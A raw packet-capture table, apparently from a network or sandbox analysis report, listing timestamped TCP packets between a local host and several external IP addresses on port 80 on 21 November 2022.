                                                                                                                                                                                    Nov 21, 2022 19:20:29.460223913 CET8049830154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:29.460486889 CET4983080192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:29.460572004 CET4983080192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:29.687148094 CET8049830154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:29.739981890 CET8049830154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:29.740087032 CET8049830154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:29.740611076 CET4983080192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:29.984174967 CET8049830154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:30.470884085 CET4983080192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:31.486491919 CET4983180192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:31.718416929 CET8049831154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:31.718714952 CET4983180192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:31.718878984 CET4983180192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:31.950462103 CET8049831154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:32.003511906 CET8049831154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:32.003628016 CET8049831154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:32.003840923 CET4983180192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:32.269403934 CET8049831154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:32.720403910 CET4983180192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:33.735943079 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:33.955148935 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:33.955477953 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:33.955990076 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:33.956078053 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.173919916 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.173955917 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.173981905 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.174357891 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.174942970 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.174978018 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175004005 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175028086 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175051928 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175076008 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175101995 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.175450087 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.392966032 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393053055 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393129110 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393202066 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393207073 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393248081 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393290997 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393296003 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393573999 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393701077 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393848896 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393903971 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393944025 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.393982887 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394020081 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394057989 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394109011 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394176960 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394248962 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394745111 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.394937992 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.395015001 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.395090103 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.395164967 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.610948086 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611005068 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611044884 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611849070 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611903906 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611943007 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.611983061 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.612838030 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.612893105 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.612932920 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.612972975 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.662729025 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.662873030 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.663583040 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:34.910861015 CET8049832154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:34.969888926 CET4983280192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:35.985481977 CET4983380192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:36.223546028 CET8049833154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:36.223799944 CET4983380192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:36.223881960 CET4983380192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:36.460506916 CET8049833154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:36.465393066 CET8049833154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:36.465861082 CET8049833154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:36.466331959 CET4983380192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:36.466331959 CET4983380192.168.11.20154.204.24.45
                                                                                                                                                                                    Nov 21, 2022 19:20:36.704503059 CET8049833154.204.24.45192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:41.794434071 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:41.910402060 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:41.910615921 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:41.910698891 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.026575089 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280814886 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280906916 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280971050 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281033039 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281088114 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281115055 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281193018 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281213999 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281302929 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281366110 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281393051 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281465054 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281514883 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281562090 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281725883 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.397725105 CET8049834192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:42.452421904 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:42.921230078 CET4983480192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:43.936796904 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:44.050992012 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.051381111 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:44.051480055 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:44.165678024 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304507971 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304596901 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304622889 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304646015 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304693937 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304864883 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304877996 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304882050 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304894924 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304908037 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304924011 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.305207014 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:44.418644905 CET8049835192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:44.467560053 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:45.061290026 CET4983580192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.076978922 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.191473007 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.191757917 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.192378998 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.192485094 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.306720972 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.306804895 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.306955099 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307054043 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307110071 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307128906 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307148933 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307192087 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307230949 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307300091 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307403088 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307435036 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307477951 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307646036 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.307719946 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421499968 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421575069 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421622992 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421668053 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421680927 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421780109 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421788931 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421838045 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.421889067 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422032118 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422065020 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422219992 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422241926 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422503948 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422760963 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.422943115 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.423233032 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.423527002 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.464328051 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.536010981 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.536035061 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.536241055 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.536427975 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.536758900 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652069092 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652133942 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652164936 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652196884 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652225971 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652257919 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652288914 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652287960 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652329922 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652362108 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652419090 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652468920 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652514935 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.652646065 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:46.766238928 CET8049836192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:46.810930014 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:47.201559067 CET4983680192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:48.217227936 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:48.332475901 CET8049837192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:48.332808018 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:48.332937956 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:48.447952986 CET8049837192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:48.560080051 CET8049837192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:48.607448101 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:58.570084095 CET8049837192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:58.570456982 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:58.570456982 CET4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    Nov 21, 2022 19:20:58.686224937 CET8049837192.185.32.157192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:03.920017958 CET4983880192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:04.082756042 CET804983838.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:04.083333015 CET4983880192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:04.083949089 CET4983880192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:04.246506929 CET804983838.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:04.285512924 CET804983838.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:04.285551071 CET804983838.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:04.285904884 CET4983880192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:05.088172913 CET4983880192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:06.103971004 CET4983980192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:06.268939018 CET804983938.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:06.269747019 CET4983980192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:06.270848036 CET4983980192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:06.435659885 CET804983938.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:06.471455097 CET804983938.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:06.471470118 CET804983938.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:06.471767902 CET4983980192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:07.275170088 CET4983980192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.290790081 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.453824997 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.454749107 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.456604958 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.456729889 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.619879961 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.619954109 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620003939 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620049000 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620088100 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620122910 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620249987 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620412111 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620589018 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620790958 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621005058 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621058941 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621170998 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621310949 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621341944 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621678114 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621849060 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783354044 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783427000 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783477068 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783519983 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783562899 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783607960 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783777952 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783906937 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783906937 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784013033 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784074068 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784118891 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784427881 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784476995 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784521103 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784564018 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784607887 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.784806967 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.785064936 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.785254955 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947081089 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947138071 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947179079 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947473049 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947860003 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947915077 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.947961092 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.948035955 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.948107958 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.948179960 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.986124039 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.986192942 CET804984038.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:08.986615896 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:09.462152958 CET4984080192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.477807045 CET4984180192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.643610001 CET804984138.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:10.643769026 CET4984180192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.643927097 CET4984180192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.808526039 CET804984138.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:10.812271118 CET804984138.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:10.812378883 CET804984138.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:10.812742949 CET4984180192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.812807083 CET4984180192.168.11.2038.55.15.214
                                                                                                                                                                                    Nov 21, 2022 19:21:10.977576017 CET804984138.55.15.214192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:16.042390108 CET4984480192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:16.189563990 CET80498443.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:16.189933062 CET4984480192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:16.190066099 CET4984480192.168.11.203.13.90.76
